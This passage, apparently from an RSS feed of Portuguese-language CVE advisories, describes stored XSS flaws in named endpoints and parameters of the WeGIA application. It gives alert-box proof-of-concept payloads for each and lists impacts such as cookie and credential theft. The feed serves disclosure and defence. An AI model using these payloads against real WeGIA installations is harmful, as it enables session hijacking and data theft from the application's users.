&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6696&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6696&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;Cadastro_Atendido.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/atendido/Cadastro_Atendido.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Poc VulDBeeee&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; ;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6696/image.png&amp;#34;
	width=&amp;#34;1896&amp;#34;
	height=&amp;#34;977&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6696/image_hu_ffda6c40e75d1bcf.png 480w, /p/cve-2025-6696/image_hu_278d1476974e3453.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;194&amp;#34;
		data-flex-basis=&amp;#34;465px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6696/image-1.png&amp;#34;
	width=&amp;#34;1918&amp;#34;
	height=&amp;#34;995&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6696/image-1_hu_eda3fb9ed78bea61.png 480w, /p/cve-2025-6696/image-1_hu_c818ef974e37dd7b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/BCqqmDk0pH8&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/BCqqmDk0pH8&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6696.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6696.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6697</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-6697/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-6697/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6697-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_tipoentradaphp-parâmetro-tipo&amp;#34;&amp;gt;CVE-2025-6697: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_tipoEntrada.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6697&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6697&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_tipoEntrada.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/matPat/adicionar_tipoEntrada.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6697-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_tipoentradaphp-parâmetro-tipo&amp;#34;&amp;gt;CVE-2025-6697: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_tipoEntrada.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6697&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6697&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_tipoEntrada.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/matPat/adicionar_tipoEntrada.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Poc VulDB&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6697/image.png&amp;#34;
	width=&amp;#34;1875&amp;#34;
	height=&amp;#34;985&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6697/image_hu_82b56e56e1511981.png 480w, /p/cve-2025-6697/image_hu_96dbb15382131ebf.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;190&amp;#34;
		data-flex-basis=&amp;#34;456px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6697/image-1.png&amp;#34;
	width=&amp;#34;1884&amp;#34;
	height=&amp;#34;997&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6697/image-1_hu_a8c1f483e3ef6844.png 480w, /p/cve-2025-6697/image-1_hu_97a661a9facc76a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;188&amp;#34;
		data-flex-basis=&amp;#34;453px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6697/image-2.png&amp;#34;
	width=&amp;#34;1909&amp;#34;
	height=&amp;#34;987&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6697/image-2_hu_ca33285700be848f.png 480w, /p/cve-2025-6697/image-2_hu_6a491cc29a99a3e4.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;193&amp;#34;
		data-flex-basis=&amp;#34;464px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/BRqtS1octSQ&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/BRqtS1octSQ&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6697.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6697.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6698</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-6698/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-6698/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6698-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_tiposaidaphp-parâmetro-tipo&amp;#34;&amp;gt;CVE-2025-6698: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_tipoSaida.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6698&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6698&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_tipoSaida.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/matPat/adicionar_tipoSaida.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6698-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_tiposaidaphp-parâmetro-tipo&amp;#34;&amp;gt;CVE-2025-6698: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_tipoSaida.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6698&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6698&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_tipoSaida.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/matPat/adicionar_tipoSaida.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
